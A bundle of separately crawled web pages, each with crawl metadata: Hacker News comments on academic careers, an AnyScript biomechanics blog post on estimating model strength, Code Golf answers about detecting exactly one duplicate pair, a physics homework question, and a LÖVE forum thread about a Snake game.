teaching cuts the number of full-time jobs. For pilots, I don't think you want to be one of the ones who gets to become a household name, as that generally only happens when you are the pilot during a crash or serious emergency. I also spent half the article thinking that the author's struggles with vocabulary and grammar might explain his/her struggles to get ahead. Perhaps he/she is a non-native speaker and that's adding to the trouble?I also noticed the many grammatical flaws in this post. I did a little digging, and the author does indeed appear to be a non-native speaker. (He's Italian: http://wiki.devicerandom.org/Who_am_I.) "Perhaps he/she is a non-native speaker and that's adding to the trouble?" - that's a red herring. Having spent some time in the academia sausage factory, I think this guy is fairly close to the mark. A lot of time and effort is consumed simply writing grants and genuflecting for government money. A perpetual stream of cheap labor (postdocs) is necessary to keep the cash spigot flowing, even though many of them have zero chance for a real career in their chosen field. I've seen incredibly petty behavior over attribution and credit on papers.I think most scientific progress happens in spite of the academic system, and not because of it. In some ways the old system of patronage was superior -- you had a direct connection between a king or wealthy merchant who had an interest in something, and the scientists who needed funding to investigate it, instead of a vast bureaucracy that probably consumes more than the total amount it exists to allocate. My current theory for success in academia (and I'm not an academic so take it with a grain of salt) is a sort of synthesis of Dick Hamming's thoughts and other things I've read.1. The purpose of a Ph.D. is to become a pre-eminent expert in a field. It's not to get a piece of paper. If you're not working on a career that will make you an expert, you'll be disappointed with your options after you have achieved your doctorate.2. Find the interesting problems that people are afraid to work on and work on them very hard.3. Use lots of techniques and approach your problems from many sides. Often something cool will shake out of the mix, and it won't have been in your research proposal.4. If you aren't self-motivated, it's not right for you. If you don't enjoy the work, take your masters and go do something you enjoy.5. Prepare your life for long hours and low pay with lots of frustration. Research doesn't proceed easily from point to point and it's all about being around when you accidentally make a breakthrough.I'm sure I'm about 90% wrong, but perhaps less wrong than the naive, "Ph.D. is a way to stay in school and not have to face the real world" point of view. My vision:A rabbit is writing into a forest.A fox see him:Fox: "What are you writing?"Rabbit: "How rabbit eat Foxes"Fox: "It is completely wrong! You deserve I eat you now!"Rabbit: "Please, just go see my supervisor before. He's in this cave."The Fox enter into the cave and never go out. The rabbit continue to write.The same occurs with a wolf. And a bit latter with a bear. Except the bear cannot enter into the cave. Then a Lion go out and kill the bear.Conclusion. No matter if you are good or not. No matter the subject of your thesis. Only matter who's your supervisor. A nice parable, though bears would destroy lions in combat if they met. :) I'm going to have to disagree with the article for many reasons: First, I'm a Ph.D student and thus obviously biased. But second, while Ph.Ds can be unwise life decisions for many, it really depends on your field, and the most relevant field to this demographic is computer science. It really doesn't work that way in CS because such a high volume of computer scientists leave academia post-Ph.D into industry. CS industry (and the finance industry) has an insatiable thirst for deeply knowledgeable qualified Ph.Ds. I don't know what the cost benefit is (of spending 4 years in academia vs getting paid high industry salaries) and I'm sure you could make more money going straight into a tech job; but I'm going to assume here that we are maximizing more than just $\sum_{life} income$ here.PG has a Ph.D; he did fine (yay anecdote). In my various internships around tech companies, there were plenty of senior coders who had Ph.Ds. And if you have a Ph.D in a relevant niche, you're probably going to be headhunted and well sought after. Where else does Wall Street or Google hire top machine learning specialists?Now a Ph.D in sociology on the other hand... where do you go from there? Sociology Ph.D.? The better sociology programs try hard to be mathematical, in particular, good with non-parametic statistics, all of multivariate statistics, and log-linear.Also actually doing science in sociology is tough because have to be so careful about problem formulation, controls, spurious correlations, sampling, measures (reliability and validity).So, for any solid quantitative work on marketing, ad targeting, public relations, public opinion polling, social program design and evaluation, organizational design and evaluation (i.e., high end HR) a good sociology background is about the best.As I recall, P&G knows this, but I don't know how many others know it! I've observed that success in an academic environment requires more than simply scientific acumen. It also requires relentless self-promotion, networking and a passion not only for science, but for winning the academic game.There are a lot of good science minded people, and there are a lot of good, driven self-promoters. Most successful scientists you encounter (apart from the odd genius) belong in the intersection between groups. Well, some amount of self-promotion is necessary for success almost anywhere.Sure, if you come up with something miraculous, then it markets itself. But otherwise you have to make sure that the right group of people knows about it or your idea will just fade away. I keep getting 503 on the site. Here's a coral cache: http://blog.devicerandom.org.nyud.net/2011/02/18/getting-a-l... It is a matter of finding balance: finding the right advisor, keeping some time for your other life (your girlfriend, your friends) even if you will have deadline rushes and think about your problem under the shower. This is a common problem to all passionate people more than only "scientists". It just seems that you find a lot of passionate scientist in academia.This writing seems about right (except that I didn't experience that much bad collaboration/competition though, even if I know it exists) to me, a second year Ph.D student in AI applied to RTS games. I don't really like that you have to work 24/7 to not be left behind, and I don't work that much indeed. Life is too short to have yours dictated by the actions of others. If you want to stop at 50hours/week while doing research, just try and make it so (focus your topic and focus on your advantages). But I'm happy pursuing a Ph.D. I don't have a fixed mindset/idea of what I would like to do next though: a startup? Working at a big firm? Seeking tenure? All options will be considered, but right now: I enjoy being paid (not much, particularly compared to my Masters prom comrades) to work on interesting topics and sometimes teach guys at the University about one of my passions (CS), with a great advisor (I picked him socially great and scientifically sharp, the mid-low h-index and the beard are byproducts), and so much intelligent people all around. > This is a common problem to all passionate people more than only "scientists". It just seems that you find a lot of passionate scientist in academia.The reason you find a lot of passionate people in academia, I think, has a large part to do with the PhD process. The monetary compensation isn't great for highly skilled labor, so the only way you'll be able to get through 5+ years of it is if you think it's the most fun thing you can be doing (or at least you think that for some large-ish fraction of the process). Just to put it in perspective, I'm sure it's a real curse to have to spend the rest of your life doing something you purportedly absolutely love to do in a hell-hole like Pisa, Italy. That said, my heart absolutely goes out to this person who is apparently really depressed. Hope he can find his happiness in life. According to someone I know who got a job there, Pisa is a very boring town. Some scenery plus a few tourist traps, low standard of living compared to the US [1], very little to do. Sounds fun before you go, much less fun after you've been there a few months.[1] For hard numbers, I found this site, suggesting a professor in Italy has a real income about 2/3 that of a US professor: http://www.worldsalaries.org/professor.shtml Pisa is a nice (but tiny) town, which will be boring if you are young and are use to the big city life. That being said I don't agree that the standard of living is low compared to the US; the standard of living really depends on what you look for. For me the salary is a poor indicator of quality of life. I'd rather earn less and have more holidays, live in a place with great food, art & culture, slower rhythm of life, less pollution, health care, and nice landscapes. I spent 7 years in Pisa and I moved to Cambridge some months ago.Cambridge is way more boring and depressing than Pisa. There is a second option, which is bare survival.What about the third option: get your PhD and work in industry? I keep coming across statistics and CS PhDs who now work for Twitter, the New York Times, and industry research labs (AT&T, Microsoft). Why isn't an industry job a viable option? "I keep coming across statistics and CS PhDs who now work for Twitter, the New York Times, and industry research labs (AT&T, Microsoft). Why isn't an industry job a viable option?"Because (speaking as one of those people), a PhD is total overkill for nearly all industry jobs, and it costs a lot more to get one. It also probably works against you in most parts of the tech industry, where there's a surprising amount of blind opposition to anyone with a doctorate.Finally, remember people with PhDs who work in industry have made a difficult, conscious decision to abandon the academic life. It's not the expected outcome, and there's an intense cultural pressure not to leave the ivory tower. "It also probably works against you in most parts of the tech industry, where there's a surprising amount of blind opposition to anyone with a doctorate."I didn't encounter any doctorate-opposition per se. I think it's more opportunity cost issue.Tech industry is quite meritocratic. Problem for many people with PhDs is that this is the only thing they can show after many years spent hidden in academia, working on esoteric things.If you keep up your real world skills during graduate school, I believe nobody is going to hold your degree against you.At least that was my experience (and experience of my classmates from graduate school).We did a lot of nitty-gritty software engineering during graduate school (ideas from our papers had to be implemented and integrated into bigger projects, that's how funding pipeline worked).Also it helps not to act smug about your degree - industry is full of very smart people who didn't even go to university. Let's be clear: I'm not complaining, nor am I talking about personal experiences of discrimination -- I don't know if my resume has ever been circular-filed because of my degree. But since I left academia I have been surprised by the number of people who have explicitly told me that they consider a PhD to be a black mark on a resume. I think a lot of people have had one or two bad experiences interviewing/hiring PhDs, and they associate the degree with the incompetence because it's so rare to interview someone with a doctorate.For what it's worth, I don't find the tech industry to be more or less meritocratic than any other -- we certainly like to pretend that our hiring methods are hyper-objective, but I've seen lots of hiring decisions that just boil down to opinion and intuition. Non-meritocratic things like pedigree and 'who you know' matter a lot, even amongst engineers. I meant no offense.Fully agree with what you said - there is a lot of sampling bias because of relative rarity of PhDs (few bad apples can completely color expectations).It was quite a surprise for me when doing a summer program at major US corporation and everybody was going gaga because our group had many PhDs.In academia, everybody has doctorate, so degree in itself doesn't really confer any additional signal.In industry, people take it as a signal even when it is not (person matters more than degree, the same person would be hireable / not-hireable whether having or not having degree).But anyways, you wouldn't want to work at places / for people which can't / don't take such things into account.That's why I mentioned meritocracy - it's nicer to work at places where it matters only if you can get the job done, not your degree / pedigree / who-you-know.But yeah, human nature, hard to fight against, we all like signaling (it's useful heuristics after all). As one major exception, Google looooooves PhDs Because a Masters is almost as good for getting an industry job, and a Masters plus a 4 years relevant job experience is superior for the majority of positions where they hire Ph.D.s. And during those four years, the doctoral candidate was getting paid crap, the Masters's graduate raking it in. There are few industries which do the kind of research that they hire PhDs for. WELCOME TO LIFE. I've worked in academia, industry and finance. It's all a pyramid. Play the game or you'll be passed over. Exactly. Those of you who think the world is fair or based on merit need to read "Power: Why Some People Have It - And Others Don't" by Jeffrey Pfeffer.The world isn't fair. This is true whether you're in academia or industry, and accepting this fact isn't a bad thing, nor does it mean you've given in to the dark side. As retube points out, if you don't play the game you're conceding before you even start. While I sympathize with the author, I don't think we can generalize from his experience all that much. For a balancing anecdote, here's my life progression to date: Bachelors: 22 Start PhD: 24 Meet girl: 25 Get engaged: 27 Submit thesis: 27 s/girlfriend/wife/: 28 Get 6 figure salary working for Mozilla: 28 Am now: 29 Yes, everything turned out better than expected (though I omitted the bit where I started and folded a company in there), and it could have gone horribly wrong. But you just can't generalize about doing a PhD, or anything really, from his anecdote, or from mine. When I graduated with my degree in physics, I was introduced to something called Ruby on Rails, and instead of go on to grad school I pivoted into the life of a web developer. Best thing that ever happened to me. I did go to physics grad school, but eventually I came around. :-) http://railstutorial.org/book#author So, I often have to justify the time I spent getting a PhD in computer science (Cryptography), because I have a start-up that programs Facebook Apps now a days.The only reason I can, is because I really didn't spend that much time actually working during the whole period and spent a lot of time learning to surf and play tennis well.I really feel like I learned a lot of valuable lessons from learning to play tennis and to surf. I'm really glad my PhD afforded me time and money to make that possible. I had a similar painful revelation, as do 95% of people who get science PhD's. Fortunately it happened when I was a postdoc, so at least I got my honorable discharge. Here's a link to that article on The Economist that states there are too many people doing too much of _everything_ and life is hard in general. Oh wait, that doesn't exist yet perhaps because that's reality. It sounds like he has spent so much time doing everything but what he _should_ be doing which is looking for something he actually _enjoys_ doing. Not that the article wasn't insightful or lucid or anything but this article struck me in he clearly enjoys complaining about his work life than doing it so there's a problem. I don't love my job but I enjoy doing it most of the time and I have great hobbies, a great partner in life and am happier and fitter than I have ever been. Perhaps he should try doing different things and see how that works out as when you are doing something you don't have any expectations. Why would you say "I love science, I just don't love doing it?". I love Formula One cars but don't know anything about driving them but I love riding motorcycles, and riding bikes. He needs to find the action verb that defines his work life and not impose any expectations from a noun he associates with "love." Isn't the real problem here that we rely on "academia" to be the "experts"? I know a number of very accomplished and intelligent folks that did not pursue PhD and have done phenomenally well in their own research. But sadly many, for credibility's sake, had to advertise themselves as think tanks. Why can't we just put the damn degrees down and listen to the person to judge their competency?? Self taught mathematicians used to be very common (100 years ago). Thankfully this guy figured it out when he was only 30. He's still got lots of time to figure out new ways to use and market the skills he has acquired.New thought: academia isn't broken, there are just too many people who want to be academics. What do people think? In a perfect world, the growth in automation that improves efficiency should create more places for people who can engage in academic research for more longer term goals. Obviously wealth distribution is far from perfect.I think it's really a wasted opportunity that so many are ready and willing to devote their lives to research and we can't make the economics work for it. New thought: academia isn't broken, there are just too many people who want to be academics. What do people think?Not too much of a new thought, the recent Economist article [0] on academic made a similar assertion. Indeed, the OP cites the very same article. I am a researcher who's fortunate enough to have found a permanent position at a place that I love doing work that I enjoy. I've served on program committees of conferences, organized workshops, etc. However, I must admit that some of the OPs thoughts are correct.There is definitely a problem with an oversupply of PhDs relative to the job market for physics (and likely biology). For a position at say Berkeley for a biology faculty position there used to be approx. 600 applicants per position. For physics at first tier or second tier institutions the number may drop to 200. Even if we are cruel and suggest that half of those are unqualified, that still leaves a large pool of extraordinarily qualified people competing for a rather small pool of jobs. I see this regularly when there are young postdocs with good publication records (Nature, PRL, etc.) who are having trouble finding permanent positions after their postdocs. Part of this may be related to decreased state funding and hiring freezes (in several states, there have been furloughs). Even for postdocs who have decided that they would prefer to work at an undergraduate institution and teach, the competition is fierce. Oddly, even for those that want to teach at a public high school, it's hard because of the education requirements (you can run a facility, teach freshmen at an elite college--but teaching high school seniors....). Things are so fierce that it's rather hard to have much selectivity about geography. This can wreak havoc with relationships and in physics is known as the two body problem--where a couple in science has difficulty finding positions in the same zipcode. As one colleague told me, she'd be happy to just have the same timezone....For my subfield, industrial research positions have been gradually drying up (at least for doing physics rather than engineering). A number of companies in the past were able to use monopoly profits to drive research (think of AT&T Bell Labs which is now but a shadow of it's former self--when I was there as an intern, it was amazing....). However, many have scaled back. Thus, I have seen a number of people pursuing various exit strategies.During the internet boom (where I had decided to drop computer engineering as a major because physics was more fun), a number of people who could code dropped out an joined startups. Later, people from Ivy institutions joined consulting firms such as McKinsey (with a "mini-MBA"). Later, a number joined in the gold rush of financial engineering. While that continues, many go through a brief masters first to get their foot in the door. A few turn to more engineering related work. So, while the unemployment rate for physics PhDs is low--not so many are actually still doing physics research.For myself, I'll take on undergraduate and high school interns. No graduate students. I really respect String Theorists who for years intentionally limited the number of students they would accept due to the paucity of permanent positions. For years, I'd been reluctant to take on a postdoc due to the current situation. Now, I've taken on my first postdoc and will do my best by him--but I have to be honest about the job market and I'm having him learn some programming as a plan B. Plan C is that I'm very confident that he'll be able to get a position in his home country afterwards.I've seen some people who are bitter (think of the opportunity costs!) when they leave. But, I've seen some who are mellow--"At least I got to work with something beautiful for awhile....".Part of the difficulty is that for scientists, you don't go into it for the money (at least I hope you don't!), you go into it for love. So, doing science becomes not just a job, but rather a calling and a way of life. So, someone's sense of self may often become tied to being a scientist--and that's hard to leave behind...So to summarize, while all fields of science are not cutthroat, given the level of competition, it is very hard to find a job. Also, given the level, then people have to work extremely hard and it takes a toll on people's personal lives (it's hard to have one when average work weeks extend to 60-80 hrs for a number of experimentalists--my solution has been to sleep less, but I'm told that's unhealthy...). [deleted] > but how credible is he as a source if he can't even pass his quals? Where did he say that? The graphic showing what actually happened vs. what he planned. That is a comic from "PhD comic", for newton sake. Where did you get the notion that he couldn't even pass his quals? Moreover, what does that have do with the correctness of his complaints.On an unrelated note, I find it mildly interesting you say it was your "fault" that you weren't cut out for academic research. This is a good outline of a problem, with absolutely no insights into any possible solutions. As far as I'm concerned this is a half finished post. It's not enough to simply complain/outline the problem. You have to use that personal experience to offer up some kind of personal redemption or possible global solution to really keep the conversation moving. You don't have to find solutions to point out a problem. He might be so fried by the experience that he doesn't have the presence of mind to come up with solutions.It seems like the goal might have been to put academia on notice so _it_ could determine whether or not it cares about the problem enough to solve it. I hope this is a farcical attempt to write an academic-style review of his Dear John letter to academia. Registration is open for Startup School 2019. Classes start July 22nd. Search:
2019-07-20 02:04:52
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2640567719936371, "perplexity": 1348.1045026160098}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-30/segments/1563195526401.41/warc/CC-MAIN-20190720004131-20190720030131-00286.warc.gz"}
https://anyscript.org/tools/estimating-maximum-model-strength/
# Getting the maximal strength of your model! When working with subject specific scaling of models, it can be a valuable tool to know what the strength of your model is for a given posture. This post will show you a way of calculating the maximal strength of a simple 2D arm model in various postures. The concepts presented can of course be extended to models involving the full body model or parts of it. For us to do this we first need to setup an example model. The model is a 2D arm model comprised of an upper and lower arm segment, attached with 8 simple muscles (fig. 1). The model is constraint to only allow movement in the global x and y direction. This allows us to impose movements which resembles flexion and extension of the shoulder and elbow joint. Since we want to show a general way of calculating the strength, we setup four load scenarios to mimic a flexion, extension, push, and pull movement. Since we want to investigate maximum strength, we need to be sure that the muscles are recruited appropriately. This is done by switching to the MinMax_Strict muscle recruiter. The first step in finding the default max strength for a posture is the know the relationship between load and max muscle activity ($mmact$). We do this by implementing a parameter study to investigate the $mmact$ across a spectrum of loads. This is done using the AnyParamStudy class as seen below: This study runs our model through the loads defined in the $load$ variable. So, in this example it does 100 steps where it starts at -200 N and stops at 300 N. This enables us to plot the $mmact$ as a function of the load. By running the parameter study for all four load scenarios we end up with a graph as seen in fig.2. We can see that for very low loads there might be other factors affecting the relationship. If we dwell by this fact and think why this could be, we could infer that the influence of gravity and segment mass could interfere with the relationship between $load$ and $mmact$. This means that when applying low external loads, the important factor in $mmact$ is the mass of the moved segments, and the gravity imposed on these segments. The graph also tells us that for high loads there is a linear relationship between load and $mmact$, and the linear part is crossing through $mmact = 1$ for all scenarios. We can use this information to calculate the maximal strength of the model. If we look at the equation for a linear function it looks like this: Where in this case y is the mmact, $x$ is the load, $a$ is the slope of the function, and $b$ is the intercept with the y-axis. The slope of the linear part can be calculated using only two points and applying the equation: Now that we know the coordinates of two points and the slope, we can start figuring out what the load is at $mmact = 1$. For this we again look at equation $\ref{eq:2}$, only this time we know the slope, the point $\left( x_{2},y_{2} \right$, and the $y_{1}$ coordinate, which should be equal to 1. We are therefore interested in finding $x_{1}$. We rearrange equation $\ref{eq:2}$, into: This allows us to evaluate what is the maximal load $x_{1}$ that the model can support in a given posture. To check our results, we can calculate the maximal strength using equation $\ref{eq:2}$ and try and implement that load in our model. As anticipated the $mmact$ reached 0.996, and the same holds across all four load scenarios. ### Find the code on GitHub The AnyScript example which shows the concepts of finding the maximum muscle strength is available on GitHub. Tags: Categories: Updated:
2018-09-24 17:31:16
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 3, "x-ck12": 0, "texerror": 0, "math_score": 0.5712584853172302, "perplexity": 294.24310238643864}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-39/segments/1537267160620.68/warc/CC-MAIN-20180924165426-20180924185826-00523.warc.gz"}
https://codegolf.stackexchange.com/questions/145030/in-search-of-a-soulmate?page=2&tab=votes
# In Search of a Soulmate Given a nonempty finite list of integers, output a truthy value if there are exactly two equal entries and all other entries are distinct, and a falsey value otherwise. ### Examples truthy: [1,1] [1,2,1] [1,6,3,4,4,7,9] falsey: [0] [1,1,1] [1,1,1,2] [1,1,2,2] [2,1,2,1,2] [1,2,3,4,5] • I suppose we can't assume that the integers will always be less than 10? – Martin Ender Oct 11 '17 at 20:17 • Yes except if your language does not support any larger integers. – flawr Oct 11 '17 at 20:22 • Can you elaborate what you mean by consistent? – flawr Oct 11 '17 at 20:40 • Saw this on the top of HNQ & thought we’d reached the final interpersonal.se question – gntskn Oct 11 '17 at 23:15 • @Walfrat Post it as your own challenge. Also such feedback is usually appreciated in the sandbox. – flawr Oct 12 '17 at 14:37 sort|uniq -dc|grep -Pqz '^ *2 .*\n$' Output is via exit code, where 0 is success (truthy) and 1 is failure (falsy). Try it online! # C (GCC), 80 78 bytes i,j,t;f(x,l)int*x;{for(i=t=0;i<l;++i)for(j=0;j<i;)t+=x[i]==x[j++];return!~-t;} -1 thanks to Jonathan Frech -1 thanks to Kevin Cruijssen Try it Online! f is a function that takes in an int* pointing to the list, and an int that is the length of the list, and returns 1 if there are exactly two equal entries and all other entries are distinct, and 0 value otherwise. The function checks all pairs of numbers in the list, counting the number of pairs, and returns whether the number of pairs is 1. • return 1==t; can be return!~-t; to save a byte. – Jonathan Frech Oct 12 '17 at 7:15 • j<i;++j)t+=x[i]==x[j] can be j<i;)t+=x[i]==x[j++] to save a byte. – Kevin Cruijssen Oct 12 '17 at 8:03 • 73 bytes – ceilingcat Nov 2 '19 at 9:11 # Bash, 36, 35 bytes for k;{ H[$k]=;};((${#H[@]}+1==$#)) TIO exit status 0: true, 1: false, ((..)) can be changed to echo $((..)), to see boolean value (1:true, 0:false) # Clojure, 31 bytes #(=(count(set %))(-(count %)1)) Try it online! Does the same as LyricLy's answer • Welcome to PPCG! – Laikoni Oct 12 '17 at 22:14 • Thanks! Hope this answer is ok, I felt like I was misusing TIO haha – Gabe Laughlin Oct 12 '17 at 22:17 # Java 8, 46 44 bytes l->l.stream().distinct().count()==l.size()-1 -2 bytes thanks to @Nevay. (Old answer: l->new java.util.HashSet(l).size()==l.size()-1) Explanation: Try it here. l-> // Method with List parameter and boolean return-type l.stream() // Stream over the List .distinct() // ignoring all duplicated items .count() // and get the total amount of non-duplicated items in the List == // And check if it's size is equals to l.size()-1 // the size of the input-list - 1 // End of method (implicit / single-line return-statement) • 44 bytes: l->l.stream().distinct().count()==l.size()-1 – Nevay Oct 13 '17 at 20:16 # Japt, 7 bytes ÊɶUâ Ê Ê // Return whether the number of Uâ // unique items in the input ¶ // is equal to ÊÉ // the input's length minus one. Try it online! # Brachylog, 7 bytes dl.&l-₁ Try it online! Truthy/falsy input is achieved through predicate success/failure, as if this predicate is run as the entire program on a single input, it will print true. if it succeeds and false. if it fails. The header on TIO is there so you can run all of the cases at once. dl The length of the input with duplicates removed . is the output variable, & and l-₁ so is the length of the input minus 1. # Regex (ECMAScript), 69 bytes The input is in the form of a comma-delimited list of nonnegative integers in decimal. ^(?=.*(\b\w+\b).*\b\1\b)(?!(.*\b\1\b){3}|.*\b(?!\1\b)(\w+\b).*\b\3\b) Try it online! ^ (?= .*(\b\w+\b) # \1 = an element that occurs at least twice .*\b\1\b # locate the second occurrence of \1 ) (?! (.*\b\1\b){3} # Assert that \1 does not occur 3 or more times | .*\b(?!\1\b)(\w+\b) # \3 = any element that's different from \1 .*\b\3\b # Assert that \3 does not occur again ) This can be trivially modified to work on positive integers in unary instead of nonnegative integers in decimal, in -2 bytes (67) by changing \w+ to x+. Making it handle nonnegative integers in unary would be a tad more involved, due to \b not matching between two commas. # Mathematica, 26 bytes (l=Length)@Union@#+1==l@#& Try it online! # Convex, 7 bytes _Å,)\,= Try it online! ## Batch, 109 bytes @set/ap=1,s=0 @for %%x in (%*)do @(for %%y in (%*)do @set/a"s+=!(%%x-%%y)")&set/ap*=s,s=0 @if %p%==4 echo 1 Port of @DJMcMayhem's answer. # Perl 5, 25+1 (-p)=26 bytes $H{$_}=1}{$\=$.-1==keys%H TIO # Batch, 131 set b=,%*, goto j :l call set f=%%b:,%1,=,#,%% if "%b%"=="%f%" exit 1 set b=%f% goto:eof :j FOR %%A IN (%b%) DO call :l %%A The %errorlevel% can be checked for the result. it works by tokenising the input, FOR %%A IN (%b%) DO call :l %%A every instance of that token + to commas is then replaced in a copy of the input with a ",#," call set f=%%b:,%1,=,#,%% the resulting string is then compared to the copy of the previous string. If there is no change in the string, it is because that number has already occured. c:\>batfile.bat 1,2,3 # Perl 6, 12 bytes {.Set+1==$_} Try it online! Convert to Set, test if the number of elements is less by one. # R, 40 bytes sum(outer(x<-scan(),x,"=="))==2+sum(x|1) Try it online! Approach is different from the other R solution - and not as golfy... • Nit's Japt answer can (I think) be ported but using unique is certainly close-ish to duplicated – Giuseppe May 24 '18 at 20:41 # 12-basic, 31 bytes FUNC S(L)?LEN(L|L)==LEN(L)-1END The | (union) operator returns an array containing elements that are in both of the input arrays. As a side effect, it removes duplicates. # Pari/GP, 16 bytes a->#a==#Set(a)+1 Try it online! # R, 38 bytes Not quite as golfed as another R answer, but a different approach. length(a<-scan())-length(unique(a))==1 Try it online! ## F#, 49 bytes let s c=Seq.distinct c|>Seq.length=Seq.length c-1 Try it online! Seq.distinct creates a sequence of all the unique elements in the collection. If the number of distinct elements is one less than the original collection, there are soulmates. # Javascript,96 bytes for(i=0;i<a.length;i++)for(j=0;j<a.length;j++)(a[i]==a[j]&& i!=j)?count++:0 console.log(count==2) for(i=0;i<a.length;i++){
2020-01-25 15:08:12
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.35826435685157776, "perplexity": 3355.1771557602356}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-05/segments/1579251672537.90/warc/CC-MAIN-20200125131641-20200125160641-00451.warc.gz"}
https://www.physicsforums.com/threads/infinite-wells-standing-wave.396378/
# Infinite well's standing wave 1. Apr 18, 2010 ### skym SHOW THAT THE INFINITE WELL'S STANDING-WAVE FUNCTION CAN BE EXPRESSED AS A SUM OF TWO TRAVELING WAVES OF THE FORM Ae^i(kx-wt) 2. Relevant equations 3. The attempt at a solution 2. Apr 18, 2010 ### nickjer Please show a bit more work. At least write out the infinite well's standing wave equation.
2018-03-23 23:31:19
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.870526909828186, "perplexity": 2976.0296340739646}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-13/segments/1521257649095.35/warc/CC-MAIN-20180323220107-20180324000107-00646.warc.gz"}
https://love2d.org/forums/viewtopic.php?t=10339
My First Game, Snake Show off your games, demos and other (playable) creations. awhite92 Prole Posts: 21 Joined: Thu Jul 26, 2012 4:25 am My First Game, Snake hi, so i found this amazing 2D game engin, and fell in love. saw a video on a beautiful snake game viewtopic.php?f=5&t=2841&hilit=snayke cant wait for it to come out but it inspired me, to make my own for my first project. its an unlimited style game, no maps, it only speeds up. so here it is, it took about a week for the first version. when you play it, press "" to show the debug info, if you would please tell me your FPS its a bit heavy, that's why its difficulty is so hard. screenshots are kinda blurry, sorry they are hosted on my G+ the snake is drawn with Code: Select all love.graphics.rectangle , but the glow is an image. the food block is an image as well, makes it a lot easier to rotate. and to make the glow so pretty, im using Code: Select all love.graphics.setBlendMode("additive")` try it out! have fun! and let me know what you think! btw this my first post.. 1.1 • added level status (every 10 food you would "level up", now you know what level you are) • tweaked how snake and food is drawn • prevented food from spawning on outer wall • turned off v-sync so people can tell me their FPS Attachments Snake.love Snake 1.1 for love 0.8.0 Last edited by awhite92 on Tue Aug 14, 2012 8:38 pm, edited 4 times in total. saved by a scholarship.. redesigned my "avatar" hoangdung Prole Posts: 1 Joined: Sat Aug 04, 2012 8:43 am Contact: Re: My First Game, Snake My girlfriend likes the pink color , she is really like this Thanks for this awhite92 Prole Posts: 21 Joined: Thu Jul 26, 2012 4:25 am Re: My First Game, Snake im glad someone liked it lol im not getting a lot of feed back. is that normal for this forum? lol saved by a scholarship.. redesigned my "avatar" Jack Prole Posts: 10 Joined: Sat Jan 07, 2012 5:01 am Re: My First Game, Snake I really like the font & tile style. The gameplay is pretty standard to Snake, but great job on the graphics. I get 60 fps, so I'm assuming you are using some kind of FPS lock or v-sync. Great job. Tesselode Party member Posts: 552 Joined: Fri Jul 23, 2010 7:55 pm Re: My First Game, Snake The game has had some unofficial releases, and you just did a pretty good recreation of it. Nice job! Can you make the snake's movement a little smoother? awhite92 Prole Posts: 21 Joined: Thu Jul 26, 2012 4:25 am Re: My First Game, Snake Jack wrote:I get 60 fps, so I'm assuming you are using some kind of FPS lock or v-sync. i think it has to do with the graphic drivers/card. mine stays around 400 fps for the first 5 or so levels, then it slowly drops. I've tested it on a handful on machines and some of them have been locked at 60fps. altho i do have v-sync on, so that mite be why. but like i said this is my first game, and i like to 